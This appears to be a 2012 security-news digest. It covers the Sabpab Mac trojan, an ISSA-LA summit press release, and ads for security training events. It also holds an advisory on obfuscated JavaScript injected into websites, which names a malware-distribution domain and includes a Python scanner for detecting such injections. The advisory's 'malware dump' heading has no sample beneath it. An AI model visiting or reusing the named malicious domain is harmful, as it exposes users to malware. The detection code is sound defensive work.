New Mac Trojan: Sabpab

A new Trojan known as “Sabpab” could hurt Mac users who run Java and Microsoft Word. Security researchers are warning users to make sure their computers have the latest software updates from both Apple and Microsoft, and to use anti-virus software. In some cases, manual removal of Sabpab may be needed.

Word about Sabpab comes on the heels of another nasty piece of malware, Flashback, which security experts said infected as many as 600,000 Macs by exploiting a vulnerability in Java software. Apple last week issued a software-based removal tool for that malware, which can be used by criminals to steal personal information, including passwords.


Sabpab, another Mac OS X backdoor Trojan horse, has been discovered

Interesting article by Graham Cluley at NakedSecurity.com

More malware for the Mac OS X platform has been discovered, hot on the heels of the revelation that some 600,000 Macs had been infected in the Flashback attack.

And just like Flashback, the new Trojan doesn’t require any user interaction to infect your Apple Mac.

The Sabpab Trojan horse exploits the same drive-by Java vulnerability used to create the Flashback botnet.

 


Executive Coach Chris Coffey is Featured Speaker at ISSA-LA 4th Annual Information Security Summit

LA Chapter of Information Systems Security Assoc.

PRLog (Press Release) Apr 12, 2012

World renowned executive and leadership coach Chris Coffey will be a featured speaker at the Los Angeles Chapter of the Information Systems Security Association’s (ISSA-LA) fourth annual Information Security Summit on Wednesday, May 16, 2012 at Hilton Universal City Hotel in Los Angeles. The theme of the one-day Summit is The Growing Cyber Threat: Protect Your Business.

Mr. Coffey will discuss concepts from his soon-to-be published book Innovative Questions and demonstrate how to turn around the perceptions of others by simply asking the right questions. In the world of high-tech Internet information security, asking the right questions means helping professionals in the field to communicate effectively with executives and business leaders who have difficulty understanding the complexity and the seriousness of cybercrime and how it can affect their businesses.

“We are excited to have Chris as a featured speaker at our summit,” said ISSA-LA President Stan Stahl, PhD. “Chris’s coaching style is direct and effective. He has coached leaders around the world in Fortune 100, 500, 1000 companies, as well as in startups and nonprofits. His ability to turn around perceptions of others by simply asking the right questions is vital if we are to change information security perceptions, getting management and users involved.”

Mr. Coffey is one of the pioneers and a significant contributor to the fields of leadership, feedback-based training and executive coaching. In 1981, while working and learning at the Center for Leadership Studies, Chris met Paul Hersey, Marshall Goldsmith, and Frank Wagner. It changed his life. Although he had been pursuing an acting career with some success, having appeared in his first feature film “A Change of Seasons” with Bo Derek, Chris had found his true calling. By 1984 he was totally out of the acting business and fully engaged in consulting as a member of the prestigious Keilty, Goldsmith & Boone (KGB) firm in La Jolla, California.

KGB is a pioneer in developing programs to teach Excellence in Management. Mr. Coffey’s stage and movie experience proved extremely useful in teaching and presenting. Chris began by leading Excellent Manager Workshops for middle managers and above at IBM, Warner Lambert, Citibank, Apple and other Fortune 500 companies. Incorporating his experience in acting and directing, Chris brings his own distinctive common-sense approach to designing and conducting workshops in leadership, management, team-building, and influencing without authority.

Mr. Coffey graduated from Fairfield University in Connecticut with a BS in marketing and is a U.S. Navy veteran.

About the LA Chapter of the Information Systems Security Association (ISSA-LA)
The Los Angeles Chapter is the founding Chapter of the Information Systems Security Association, an international not-for-profit organization of information security professionals and practitioners. ISSA-LA is the premier catalyst and information source in Los Angeles for improving the practice of information security. The Chapter conducts outreach programs to business, nonprofits, government and consumers.  For more information or to register for ISSA-LA’s 4th Annual Information Security Summit, please visit: www.issa-la.org .

# # #

About Carl Terzian Associates
Networking-Crisis Management-Media Placement-Special Events-Image Building:
Public relations services to such clients as law, healthcare, entertainment, products, real estate, banking, education, hospitality, nonprofits.

JS:Cruzer-B, JS/Obfuscated, JS/Cruzer.C.gen, JS/TrojanDownloader.Agent.NKW

Description:

A malicious and encoded javascript file was found inside the site content and is being used to distribute malware (from newportalse.com and other domains). Any user visiting the infected site could be compromised (desktop antivirus will flag it as JS:Cruzer-B, JS/Obfuscated, JS/Cruzer.C.gen, JS/TrojanDownloader.Agent.NKW and others, depending on the intermediary domains and AV product).

Domains used in this attack:

newportalse.com
(and many others)

Affecting:

Any web site (no specific target).

Clean up:

This malware is generally hidden at the bottom of the .html or javascript files.
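A cleanup pass can start by flagging files whose tail looks like the injection described above. The following scanner is an added example, not part of the original advisory; the indicators it scores (hex-escape density, an `eval(function(` unpacker, `_0x`-style identifiers, content after `</html>`), the 4 KiB tail window and the two-indicator threshold are assumptions chosen for illustration, and the sample strings are constructed and inert.

```python
import re
from pathlib import Path

TAIL_CHARS = 4096  # assumption: injected code sits in the last 4 KiB of the file
WEB_SUFFIXES = {".html", ".htm", ".js"}
HEX_ESCAPE = re.compile(r"\\x[0-9a-fA-F]{2}")
EVAL_PACKED = re.compile(r"eval\s*\(\s*function\s*\(")
HEX_IDENT = re.compile(r"\b_0x[0-9a-fA-F]{3,}\b")

def score_tail(text, tail_chars=TAIL_CHARS):
    """Return the list of indicators found in the last tail_chars of text."""
    tail = text[-tail_chars:]
    reasons = []
    # Each \xNN escape occupies four characters of the tail.
    if tail and 4 * len(HEX_ESCAPE.findall(tail)) / len(tail) > 0.30:
        reasons.append("hex-escape density above 30%")
    if EVAL_PACKED.search(tail):
        reasons.append("eval(function(...)) unpacker")
    if len(set(HEX_IDENT.findall(tail))) >= 2:
        reasons.append("_0x-style identifiers")
    # A legitimate page normally has nothing but whitespace after </html>.
    end = text.lower().rfind("</html>")
    if end != -1 and text[end + len("</html>"):].strip():
        reasons.append("content after </html>")
    return reasons

def scan_tree(root):
    """Map relative path -> indicators for web files with two or more hits."""
    findings = {}
    for path in sorted(Path(root).rglob("*")):
        if path.is_file() and path.suffix.lower() in WEB_SUFFIXES:
            text = path.read_text(encoding="utf-8", errors="replace")
            reasons = score_tail(text)
            if len(reasons) >= 2:  # one indicator alone is too noisy
                findings[str(path.relative_to(root))] = reasons
    return findings

# Constructed, inert samples (not taken from any real site).
CLEAN = "<html><body><p>Hello</p><script>var n = 1;</script></body></html>\n"
INJECTED = (CLEAN + '<script>var _0xaaaa=["' + "\\x41" * 60 +
            '"];eval(function(_0xbbbb){return _0xbbbb}(_0xaaaa[0]));</script>\n')

if __name__ == "__main__":
    import sys
    for name, why in scan_tree(sys.argv[1] if len(sys.argv) > 1 else ".").items():
        print(f"{name}: {', '.join(why)}")
```

Flagged files still need manual review against a known-good copy, since the scanner only inspects the end of each file and legitimately packed scripts can trip the same indicators.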

Malware dump (sample of malware):


SANSFIRE 2012 is coming to Washington, DC

SANSFIRE 2012 will take place at our Hilton Washington and Towers campus, July 6-15.  There will be more than 40 SANS IT Security Training courses available.  This training event is powered by the (ISC) Internet Storm Center and is an opportunity to meet the ISC handlers.
Each evening, the ISC handlers share compelling talks on their most interesting experiences and newest cyber hazards. These special presentations are free to everyone who attends a course at SANSFIRE 2012. For more than 10 years, the Internet Storm Center has been providing free analysis and warning to our community. It is your chance to meet some of our handlers face to face, to listen to what they have to report, and to ask questions about topics that interest you.
New cutting-edge courses coming to SANSFIRE 2012:

· Security 575: Mobile Device Security and Ethical Hacking
· Security 579: Virtualization and Private Cloud Security
· Forensics 508: Advanced Computer Forensic Analysis and Incident Response

Many of our courses offered at SANSFIRE 2012 are associated with a GIAC Certification. Put the skills you’ll learn to practical use and join over 41,500 GIAC certified professionals who make the IT Security industry safe!

NetWars Tournament Play: Two Night Interactive Security Challenge:

Thursday, July 12 & Friday, July 13 * 6:30pm – 9:30pm

**All students who register for a 5- or 6- day course will be eligible to play NetWars for FREE. Register Now!

For complete details regarding SANSFIRE 2012 please visit:

http://www.sans.org/info/103104

*** Free corresponding GIAC Certification Exam attempt (a $549 value) when you register and pay for a qualifying SANSFIRE 2012 course with referral code: SecOrb_SFGIAC ***

SC eSymposium: Cyber espionage


Date: Tuesday, April 24
Location: Your computer

Earn CPE credits for attending*

Click on the link below to register for FREE:
http://sc.haymarketcomm.net/r/?ZXU=1860736&ZXD=146817634

Those engaging in cyber espionage to steal classified and/or proprietary data from U.S. agencies and other organizations are riding high. Foreign spies, including U.S. allies, are increasingly launching digital assaults against the nation to steal sensitive economic secrets, according to a recent report by the U.S. Office of National Counterintelligence Executive. The theft of this critical information shows that attackers – state-sponsored or not – are enlisting whatever weaknesses in systems they can to steal corporate and government data, often going unnoticed for months. Experts share background on the types of attacks to watch out for and what to do to thwart them.

Platinum sponsors:
EdgeWave
HP Enterprise Security

SC World Congress 24/7 exhibitors:
Damballa
LogRhythm
Secunia
Solutionary
Sophos

Click on the link below to register for FREE:
http://sc.haymarketcomm.net/r/?ZXU=1860737&ZXD=146817634

For more information, please e-mail maggie.keller@haymarketmedia.com

*SC Magazine is a designated (ISC)2 CPE provider. CPE credits will be issued to only live attendees with (ISC)2 credentials.